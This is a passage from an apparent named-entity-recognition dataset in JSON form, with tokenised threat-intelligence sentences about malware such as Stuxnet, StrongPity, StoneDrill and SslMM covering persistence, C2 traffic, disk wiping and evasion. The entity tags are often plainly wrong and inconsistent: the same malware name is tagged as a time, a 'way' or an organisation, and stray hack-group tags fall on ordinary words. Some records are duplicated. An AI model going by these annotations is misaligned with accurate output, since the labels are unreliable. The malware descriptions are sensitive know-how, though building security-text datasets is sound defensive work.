"O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Squirrelwaffle", "has", "used", "malicious", "VBA", "macros", "in", "Microsoft", "Word", "documents", "and", "Excel", "spreadsheets", "that", "execute", "an", "`AutoOpen`", "subroutine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-SamFile", "I-SamFile", "I-SamFile", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Squirrelwaffle", "has", "used", "HTTP", "POST", "requests", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Squirrelwaffle", "has", "used", "`cmd.exe`", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "SslMM", "contains", "a", "feature", "to", "manipulate", "process", "privileges", "and", "tokens." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "B-HackOrg" ] }, { "tokens": [ "SslMM", "identifies", "and", "kills", "anti-malware", "processes." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SslMM", "has", "a", "hard-coded", "primary", "and", "backup", "C2", "string." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SslMM", "creates", "a", "new", "thread", "implementing", "a", "keylogging", "facility", "using", "Windows", "Keyboard", "Accelerators." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "To", "establish", "persistence,", "SslMM", "identifies", "the", "Start", "Menu", "Startup", "directory", "and", "drops", "a", "link", "to", "its", "own", "executable", "disguised", "as", "an", "“Office", "Start,”", "“Yahoo", "Talk,”", "“MSN", "Gaming", "Z0ne,”", "or", "“MSN", "Talk”", "shortcut." ], "ner_tags": [ "O", "O", "O", "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-Idus", "O", "B-Idus", "B-SecTeam", "O", "B-SamFile", "B-SecTeam", "O" ] }, { "tokens": [ "To", "establish", "persistence,", "SslMM", "identifies", "the", "Start", "Menu", "Startup", "directory", "and", "drops", "a", "link", "to", "its", "own", "executable", "disguised", "as", "an", "“Office", "Start,”", "“Yahoo", "Talk,”", "“MSN", "Gaming", "Z0ne,”", "or", "“MSN", "Talk”", "shortcut." ], "ner_tags": [ "O", "O", "O", "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-Idus", "O", "B-Idus", "B-SecTeam", "O", "B-SamFile", "B-SecTeam", "O" ] }, { "tokens": [ "To", "establish", "persistence,", "SslMM", "identifies", "the", "Start", "Menu", "Startup", "directory", "and", "drops", "a", "link", "to", "its", "own", "executable", "disguised", "as", "an", "“Office", "Start,”", "“Yahoo", "Talk,”", "“MSN", "Gaming", "Z0ne,”", "or", "“MSN", "Talk”", "shortcut." ], "ner_tags": [ "O", "O", "O", "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-Idus", "O", "B-Idus", "B-SecTeam", "O", "B-SamFile", "B-SecTeam", "O" ] }, { "tokens": [ "SslMM", "sends", "information", "to", "its", "hard-coded", "C2,", "including", "OS", "version,", "service", "pack", "information,", "processor", "speed,", "system", "name,", "and", "OS", "install", "date." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "I-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SslMM", "sends", "the", "logged-on", "username", "to", "its", "hard-coded", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Starloader", "decrypts", "and", "executes", "shellcode", "from", "a", "file", "called", "Stars.jps." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Starloader", "has", "masqueraded", "as", "legitimate", "software", "update", "packages", "such", "as", "Adobe", "Acrobat", "Reader", "and", "Intel." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "B-Tool" ] }, { "tokens": [ "StoneDrill", "has", "a", "disk", "wiper", "module", "that", "targets", "files", "other", "than", "those", "in", "the", "Windows", "directory." ], "ner_tags": [ "B-Way", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StoneDrill", "can", "wipe", "the", "accessible", "physical", "or", "logical", "drives", "of", "the", "infected", "machine." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StoneDrill", "can", "wipe", "the", "master", "boot", "record", "of", "an", "infected", "computer." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StoneDrill", "has", "obfuscated", "its", "module", "with", "an", "alphabet-based", "table", "or", "XOR", "encryption." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StoneDrill", "has", "been", "observed", "deleting", "the", "temporary", "files", "once", "they", "fulfill", "their", "task." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StoneDrill", "has", "downloaded", "and", "dropped", "temporary", "files", "containing", "scripts;", "it", "additionally", "has", "a", "function", "to", "upload", "files", "from", "the", "victims", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "StoneDrill", "has", "relied", "on", "injecting", "its", "payload", "directly", "into", "the", "process", "memory", "of", "the", "victim's", "preferred", "browser." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StoneDrill", "has", "looked", "in", "the", "registry", "to", "find", "the", "default", "browser", "path." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StoneDrill", "can", "take", "screenshots." ], "ner_tags": [ "B-Way", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "StoneDrill", "can", "check", "for", "antivirus", "and", "antimalware", "programs." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StoneDrill", "has", "the", "capability", "to", "discover", "the", "system", "OS,", "Windows", "version,", "architecture", "and", "environment." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StoneDrill", "can", "obtain", "the", "current", "date", "and", "time", "of", "the", "victim", "machine." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StoneDrill", "has", "used", "several", "anti-emulation", "techniques", "to", "prevent", "automated", "analysis", "by", "emulators", "or", "sandboxes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StoneDrill", "has", "several", "VBS", "scripts", "used", "throughout", "the", "malware's", "lifecycle." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StoneDrill", "has", "used", "the", "WMI", "command-line", "(WMIC)", "utility", "to", "run", "tasks." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "StreamEx", "has", "the", "ability", "to", "enumerate", "drive", "types." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "StreamEx", "has", "the", "ability", "to", "modify", "the", "Registry." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "StreamEx", "obfuscates", "some", "commands", "by", "using", "statically", "programmed", "fragments", "of", "strings", "when", "starting", "a", "DLL.", "It", "also", "uses", "a", "one-byte", "xor", "against", "0x91", "to", "encode", "configuration", "data." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StreamEx", "has", "the", "ability", "to", "enumerate", "processes." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "StreamEx", "uses", "rundll32", "to", "call", "an", "exported", "function." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StreamEx", "has", "the", "ability", "to", "scan", "for", "security", "tools", "such", "as", "firewalls", "and", "antivirus", "tools." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "StreamEx", "has", "the", "ability", "to", "enumerate", "system", "information." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "StreamEx", "has", "the", "ability", "to", "remotely", "execute", "commands." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "StreamEx", "establishes", "persistence", "by", "installing", "a", "new", "service", "pointing", "to", "its", "DLL", "and", "setting", "the", "service", "to", "auto-start." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrifeWater", "can", "collect", "data", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrifeWater", "can", "send", "data", "and", "files", "from", "a", "compromised", "host", "to", "its", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrifeWater", "can", "self", "delete", "to", "cover", "its", "tracks." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "StrifeWater", "can", "enumerate", "files", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrifeWater", "can", "download", "updates", "and", "auxiliary", "modules." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "StrifeWater", "has", "been", "named", "`calc.exe`", "to", "appear", "as", "a", "legitimate", "calculator", "program." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrifeWater", "can", "use", "a", "variety", "of", "APIs", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "B-Tool", "O", "O" ] }, { "tokens": [ "StrifeWater", "has", "create", "a", "scheduled", "task", "named", "`Mozilla\\Firefox", "Default", "Browser", "Agent", "409046Z0FF4A39CB`", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrifeWater", "has", "the", "ability", "to", "take", "screen", "captures." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "StrifeWater", "can", "encrypt", "C2", "traffic", "using", "XOR", "with", "a", "hard", "coded", "key." ], "ner_tags": [ "B-Idus", "O", "B-Features", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrifeWater", "can", "collect", "the", "OS", "version,", "architecture,", "and", "machine", "name", "to", "create", "a", "unique", "token", "for", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrifeWater", "can", "collect", "the", "user", "name", "from", "the", "victim's", "machine." ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrifeWater", "can", "collect", "the", "time", "zone", "from", "the", "victim's", "machine." ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrifeWater", "can", "modify", "its", "sleep", "time", "responses", "from", "the", "default", "of", "20-22", "seconds." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrifeWater", "can", "execute", "shell", "commands", "using", "`cmd.exe`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "StrongPity", "can", "compress", "and", "encrypt", "archived", "files", "into", "multiple", ".sft", "files", "with", "a", "repeated", "xor", "encryption", "scheme." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrongPity", "has", "encrypted", "C2", "traffic", "using", "SSL/TLS." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "StrongPity", "has", "a", "file", "searcher", "component", "that", "can", "automatically", "collect", "and", "archive", "files", "based", "on", "a", "predefined", "list", "of", "file", "extensions." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrongPity", "can", "automatically", "exfiltrate", "collected", "documents", "to", "the", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrongPity", "has", "been", "signed", "with", "self-signed", "certificates." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrongPity", "can", "add", "directories", "used", "by", "the", "malware", "to", "the", "Windows", "Defender", "exclusions", "list", "to", "prevent", "detection." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrongPity", "has", "used", "encrypted", "strings", "in", "its", "dropper", "component." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "StrongPity", "can", "exfiltrate", "collected", "documents", "through", "C2", "channels." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrongPity", "can", "delete", "previously", "exfiltrated", "files", "from", "the", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrongPity", "can", "parse", "the", "hard", "drive", "on", "a", "compromised", "host", "to", "identify", "specific", "file", "extensions." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrongPity", "has", "the", "ability", "to", "hide", "the", "console", "window", "for", "its", "document", "search", "module", "from", "the", "user." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrongPity", "can", "download", "files", "to", "specified", "targets." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "StrongPity", "has", "been", "executed", "via", "compromised", "installation", "files", "for", "legitimate", "software", "including", "compression", "applications,", "security", "software,", "browsers,", "file", "recovery", "applications,", "and", "other", "tools", "and", "utilities." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O", "I-Tool", "O", "B-Way", "B-Tool", "O", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrongPity", "has", "named", "services", "to", "appear", "legitimate." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrongPity", "has", "been", "bundled", "with", "legitimate", "software", "installation", "files", "for", "disguise." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrongPity", "can", "use", "multiple", "layers", "of", "proxy", "servers", "to", "hide", "terminal", "nodes", "in", "its", "infrastructure." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrongPity", "has", "used", "HTTPS", "over", "port", "1402", "in", "C2", "communication." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrongPity", "can", "use", "PowerShell", "to", "add", "files", "to", "the", "Windows", "Defender", "exclusions", "list." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrongPity", "can", "determine", "if", "a", "user", "is", "logged", "in", "by", "checking", "to", "see", "if", "explorer.exe", "is", "running." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "StrongPity", "can", "use", "the", "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", "Registry", "key", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "StrongPity", "can", "identify", "if", "ESET", "or", "BitDefender", "antivirus", "are", "installed", "before", "dropping", "its", "payload." ], "ner_tags": [ "B-Time", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrongPity", "can", "install", "a", "service", "to", "execute", "itself", "as", "a", "service." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrongPity", "can", "identify", "the", "hard", "disk", "volume", "serial", "number", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrongPity", "can", "identify", "the", "IP", "address", "of", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StrongPity", "can", "use", "HTTP", "and", "HTTPS", "in", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "StrongPity", "has", "created", "new", "services", "and", "modified", "existing", "services", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "encrypts", "exfiltrated", "data", "via", "C2", "with", "static", "31-byte", "long", "XOR", "keys." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "used", "a", "digitally", "signed", "driver", "with", "a", "compromised", "Realtek", "certificate." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "infected", "WinCC", "machines", "via", "a", "hardcoded", "database", "server", "password." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "decrypts", "resources", "that", "are", "loaded", "into", "memory", "and", "executed." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "enumerates", "user", "accounts", "of", "the", "domain." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "attempts", "to", "access", "network", "resources", "with", "a", "domain", "account’s", "credentials." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "injects", "an", "entire", "DLL", "into", "an", "existing,", "newly", "created,", "or", "preselected", "trusted", "process." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "uses", "encrypted", "configuration", "blocks", "and", "writes", "encrypted", "files", "to", "disk." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Features", "I-Features", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O" ] }, { "tokens": [ "Stuxnet", "checks", "for", "specific", "operating", "systems", "on", "32-bit", "machines,", "Registry", "keys,", "and", "dates", "for", "vulnerabilities,", "and", "will", "exit", "execution", "if", "the", "values", "are", "not", "met." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "sends", "compromised", "victim", "information", "via", "HTTP." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Stuxnet", "used", "MS10-073", "and", "an", "undisclosed", "Task", "Scheduler", "vulnerability", "to", "escalate", "privileges", "on", "local", "Windows", "machines." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "propagates", "using", "the", "MS10-061", "Print", "Spooler", "and", "MS08-067", "Windows", "Server", "Service", "vulnerabilities." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "I-Way", "B-SecTeam", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "has", "the", "ability", "to", "generate", "new", "C2", "domains." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "Stuxnet", "uses", "an", "RPC", "server", "that", "contains", "a", "routine", "for", "file", "deletion", "and", "also", "removes", "itself", "from", "the", "system", "through", "a", "DLL", "export", "by", "deleting", "specific", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-Features" ] }, { "tokens": [ "Stuxnet", "uses", "a", "driver", "to", "scan", "for", "specific", "filesystem", "driver", "objects." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "B-Features", "O", "O" ] }, { "tokens": [ "Stuxnet", "reduces", "the", "integrity", "level", "of", "objects", "to", "allow", "write", "actions." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "can", "delete", "OLE", "Automation", "and", "SQL", "stored", "procedures", "used", "to", "store", "malicious", "payloads." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "B-HackOrg", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "installs", "an", "RPC", "server", "for", "P2P", "communications." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "uses", "an", "RPC", "server", "that", "contains", "a", "file", "dropping", "routine", "and", "support", "for", "payload", "version", "updates", "for", "P2P", "communications", "within", "a", "victim", "network." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "enumerates", "user", "accounts", "of", "the", "local", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "can", "create", "registry", "keys", "to", "load", "driver", "files." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "uses", "the", "SetSecurityDescriptorDacl", "API", "to", "reduce", "object", "integrity", "levels." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "enumerates", "the", "directories", "of", "a", "network", "resource." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "enumerates", "removable", "drives", "for", "infection." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "searches", "the", "Registry", "for", "indicators", "of", "security", "programs." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Purp", "O", "O" ] }, { "tokens": [ "Stuxnet", "can", "propagate", "via", "peer-to-peer", "communication", "and", "updates", "using", "RPC." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Stuxnet", "can", "propagate", "via", "removable", "media", "using", "an", "autorun.inf", "file", "or", "the", "CVE-2010-2568", "LNK", "vulnerability." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "Stuxnet", "uses", "a", "Windows", "rootkit", "to", "mask", "its", "binaries", "and", "other", "relevant", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "propagates", "to", "available", "network", "shares." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "used", "xp_cmdshell", "to", "store", "and", "execute", "SQL", "code." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "schedules", "a", "network", "job", "to", "execute", "two", "minutes", "after", "host", "infection." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "enumerates", "the", "currently", "running", "processes", "related", "to", "a", "variety", "of", "security", "products." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "calls", "LoadLibrary", "then", "executes", "exports", "from", "a", "DLL." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "transforms", "encrypted", "binary", "data", "into", "an", "ASCII", "string", "in", "order", "to", "use", "it", "as", "a", "URL", "parameter", "value." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "encodes", "the", "payload", "of", "system", "information", "sent", "to", "the", "command", "and", "control", "servers", "using", "a", "one", "byte", "0xFF", "XOR", "key.", "Stuxnet", "also", "uses", "a", "31-byte", "long", "static", "byte", "string", "to", "XOR", "data", "sent", "to", "command", "and", "control", "servers.", "The", "servers", "use", "a", "different", "static", "key", "to", "encrypt", "replies", "to", "the", "implant." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "collects", "system", "information", "including", "computer", "and", "domain", "names,", "OS", "version,", "and", "S7P", "paths." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "collects", "the", "IP", "address", "of", "a", "compromised", "system." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "collects", "the", "time", "and", "date", "of", "a", "system", "when", "it", "is", "infected." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "infects", "remote", "servers", "via", "network", "shares", "and", "by", "infecting", "WinCC", "database", "views", "with", "malicious", "code." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "extracts", "and", "writes", "driver", "files", "that", "match", "the", "times", "of", "other", "legitimate", "files." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stuxnet", "attempts", "to", 